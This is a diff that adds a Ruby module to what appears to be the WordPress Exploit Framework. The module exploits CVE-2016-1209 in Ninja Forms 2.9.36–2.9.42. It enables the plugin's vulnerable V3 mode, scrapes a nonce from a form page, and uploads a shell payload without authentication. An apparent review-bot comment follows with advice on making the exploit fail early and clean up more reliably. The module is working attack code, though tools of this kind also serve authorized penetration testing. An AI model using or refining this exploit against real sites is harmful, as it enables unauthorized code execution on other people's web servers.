| 1 | +class Wpxf::Exploit::NinjaFormsUnauthenticatedShellUpload < Wpxf::Module |
| 2 | + include Wpxf::WordPress::ShellUpload |
| 3 | + |
| 4 | + def initialize |
| 5 | + super |
| 6 | + |
| 7 | + update_info( |
| 8 | + name: 'Ninja Forms 2.9.36 to 2.9.42 Unauthenticated Shell Upload', |
| 9 | + author: [ |
| 10 | + 'James Golovich', # Discovery and disclosure |
| 11 | + 'Rob Carr <rob[at]rastating.com>' # WPXF module |
| 12 | + ], |
| 13 | + references: [ |
| 14 | + ['CVE', '2016-1209'], |
| 15 | + ['WPVDB', '8485'], |
| 16 | + ['URL', 'http://www.pritect.net/blog/ninja-forms-2-9-42-critical-security-vulnerabilities'] |
| 17 | + ], |
| 18 | + date: 'May 04 2016' |
| 19 | + ) |
| 20 | + |
| 21 | + register_options([ |
| 22 | + StringOption.new( |
| 23 | + name: 'form_path', |
| 24 | + desc: 'The relative path of the page that hosts any form served by Ninja Forms', |
| 25 | + required: true |
| 26 | + ) |
| 27 | + ]) |
| 28 | + end |
| 29 | + |
| 30 | + def check |
| 31 | + check_plugin_version_from_readme('ninja-forms', '2.9.43', '2.9.36') |
| 32 | + end |
| 33 | + |
| 34 | + def uploader_url |
| 35 | + wordpress_url_admin_ajax |
| 36 | + end |
| 37 | + |
| 38 | + def payload_body_builder |
| 39 | + builder = Utility::BodyBuilder.new |
| 40 | + builder.add_field('action', 'nf_async_upload') |
| 41 | + builder.add_field('security', ninja_form_nonce) |
| 42 | + builder.add_file_from_string(Utility::Text.rand_alpha(5), payload.encoded, payload_name) |
| 43 | + builder |
| 44 | + end |
| 45 | + |
| 46 | + def uploaded_payload_location |
| 47 | + normalize_uri(wordpress_url_uploads, "nftmp-#{payload_name.downcase}") |
| 48 | + end |
| 49 | + |
| 50 | + def fetch_ninja_form_nonce |
| 51 | + res = execute_get_request(url: normalize_uri(full_uri, datastore['form_path'])) |
| 52 | + return false unless res && res.code == 200 |
| 53 | + @ninja_form_nonce = res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1] |
| 54 | + @ninja_form_nonce |
| 55 | + end |
| 56 | + |
| 57 | + def before_upload |
| 58 | + # Enable the v3 functionality. |
| 59 | + emit_info 'Enabling vulnerable V3 functionality...' |
| 60 | + execute_get_request(url: full_uri, params: { 'nf-switcher' => 'upgrade' }) |
| 61 | + |
| 62 | + # Fetch a nonce for the upload. |
| 63 | + emit_info 'Fetching Ninja Form nonce...' |
| 64 | + unless fetch_ninja_form_nonce |
| 65 | + emit_error 'Failed to acquire a valid nonce' |
| 66 | + emit_error "Ensure that #{normalize_uri(full_uri, datastore['form_path'])} contains a valid form" |
| 67 | + return false |
| 68 | + end |
| 69 | + emit_success "Nonce acquired: #{ninja_form_nonce}", true |
| 70 | + |
| 71 | + super |
| 72 | + end |
| 73 | + |
| 74 | + def cleanup |
| 75 | + # Disable the v3 functionality. |
| 76 | + execute_get_request(url: full_uri, params: { 'nf-switcher' => 'rollback' }) |
| 77 | + super |
| 78 | + end |
| 79 | + |
| 80 | + attr_reader :ninja_form_nonce |
| 81 | +end |
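Review bot: The `nf-switcher=upgrade` request at the top of before_upload changes the target's plugin mode but its response is discarded, so the module carries on to the nonce fetch even when the switch did not take effect, and the later "Failed to acquire a valid nonce" error would then steer the operator toward the wrong cause (the form path) rather than the mode switch. Capturing the result and failing early makes the dependency explicit: `res = execute_get_request(url: full_uri, params: { 'nf-switcher' => 'upgrade' })` followed by `return false unless res` with an `emit_error 'Failed to enable V3 functionality'`; whether a 200 or a redirect is the expected success status needs confirming against the plugin before also checking `res.code`. Because the `return false` in before_upload happens before `super`, it is also worth confirming that the framework still runs cleanup on that path; if it does not, a failed run leaves the target with the V3 switch toggled on, a persistent state change on a live site that the operator should at least be told about, for example with an `emit_warning` before returning.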